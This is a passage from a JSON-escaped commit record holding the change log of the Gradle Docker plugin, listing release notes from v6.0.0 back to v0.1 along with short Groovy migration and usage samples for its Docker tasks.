documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`, `DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to a nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5
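\n\nA hypothetical migration sketch for the pull-task rename described above (image name and import path are illustrative):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.DockerPullImage\n\ntask pullImage(type: DockerPullImage) {\n    image = 'alpine:3.10'  \/\/ replaces the removed `tag` property\n    doLast {\n        \/\/ getImage() replaces the removed getImageId()\n        println image.get()\n    }\n}\n----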
\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issues\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issues\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is no longer injected into the method `runRemoteCommand` - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation 
warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations (a migration sketch follows the v4.0.5 notes below) - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/709[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]
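\n\nA hypothetical migration sketch for the deprecations removed in v4.2.0 (repository names, values and import paths are illustrative; exact property typing may vary between versions):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerCreateContainer\nimport com.bmuschko.gradle.docker.tasks.image.DockerBuildImage\n\ntask buildImage(type: DockerBuildImage) {\n    inputDir = file('docker')\n    tags.set(['myorg\/myapp:latest'])  \/\/ was: tag = 'myorg\/myapp:latest'\n    tags.add('myorg\/myapp:1.0')       \/\/ add\/addAll work after tags.set (Issue 712)\n}\n\ntask createContainer(type: DockerCreateContainer) {\n    targetImageId 'myorg\/myapp:latest'\n    envVars = ['FOO': 'bar']          \/\/ was: env = ['FOO=bar']\n}\n----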
\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure-proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have 
all its keys\/values resolved to Java strings. - {uri-github}\/pull\/617[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/617[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDEs. - {uri-github}\/pull\/617[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When the plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars`, which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. Its `probe` method has been renamed to `livenessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained the ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional; if NOT defined it will fall back to checking whether the container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fall back to the just-created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow the user to define a list of successful exit codes the exec is allowed to return, failing if the actual exit code is not in the list. Default behavior is to do no check (usage sketch below). - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer`, which will poll, for some defined amount of time, a running container's logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and, if that does not succeed in time, issue a stop request. - {uri-github}\/pull\/591[Pull request 591]
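\n\nA hypothetical usage sketch for `successOnExitCodes` (container ID and command are illustrative; `cmd` was later replaced by `commands`, see the v4.2.0 notes):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerExecContainer\n\ntask execInContainer(type: DockerExecContainer) {\n    targetContainerId 'my-container'\n    cmd = ['sh', '-c', 'exit 2']\n    successOnExitCodes = [0, 2]  \/\/ any other exit code fails the task\n}\n----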
\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating it for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create the file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during Gradle's configuration phase. 
- {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK`, then fall back to using the generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump version of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use the Groovy join function in favor of the JDK 8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standards - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump version of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump version of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump version of docker-java to 3.0.11 - 
{uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke the onNext closure's call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Added new task `DockerInspectExecContainer`, which allows inspecting an exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest` tasks can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`; instead, the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest` tasks work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump version of docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per single ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups, as well as defaulting to the alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on 
`DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix for not checking whether the parent dir already exists before creating it with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overridden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - 
{uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task, which needs to receive a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` calls a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 